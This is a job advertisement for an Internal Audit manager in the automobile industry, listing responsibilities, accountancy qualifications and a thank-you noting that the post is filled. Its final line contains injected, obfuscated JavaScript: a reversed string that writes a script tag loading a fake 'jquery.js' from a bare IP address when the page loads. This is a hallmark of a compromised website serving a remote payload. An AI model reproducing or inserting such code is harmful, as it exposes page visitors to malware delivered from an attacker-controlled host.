Industry : Automobile
- To manage the Internal Audit function encompassing planning, execution of audits, and administration of the department.
- To supervise the audit team(s) in audit assignments on all aspects of the Group’s business operations.
- Review of audit findings & finalisation of Audit Report.
- Drafting of new sections to existing Audit Programme Manual.
- Key member of the Risk Management team.
- Any other ad hoc assignments requested by Management
- Accounts graduate from foreign/external university
- A member of one of the following professional accountancy bodies, e. ACCA, ICMA, CPA
- Computer savvy – strong in MS Office applications. IT audit skills will be an added advantage
- Strong grasp & appreciation of financial and operational systems
- Ability to make sound & practical recommendation to management for improvement to systems & business operations
- Strong analytical and investigative skills with a keen eye for details
- At least 5 years post-qualifying experience with a reputable audit/ Bursa company exposed to a wide variety of work in accounts, internal controls & investigation
- Flair in writing concise Audit Reports
- Good spoken English
- Person of integrity & honesty, good interpersonal skills with all levels of staff
- Willingness to travel on short notice.
Congratulations to the one of the most profesional bright minded candidate, that we have the privilege to work with, who has secured this position. Thanks to all others who have applied for the position 🙂 document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))